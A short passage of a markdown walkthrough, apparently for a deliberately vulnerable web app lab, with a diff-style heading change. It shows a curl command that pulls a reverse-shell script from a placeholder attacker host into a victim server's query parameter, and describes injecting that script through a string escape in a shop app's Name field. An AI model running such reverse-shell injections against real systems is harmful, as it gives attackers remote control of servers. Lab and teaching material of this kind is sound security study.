tatumroaquin/vwa-ssji/payload/Linux.md

 curl -G --data-urlencode "year=$(curl -s http://<hacker-ip>:5000/revshell.js)" http://<victim-ip>:3000
 ```

-## 1.3.2) Injecting payload into The Cutlery Shop App
+## 1.4 Injecting payload into "The Cutlery Shop" web app
 Using the form fields of the application, you can perform a string escape on the `Name` field, and inject the contents of [revshell.js](./revshell.js) there.

 ![string-escape](../images/string-escape.png)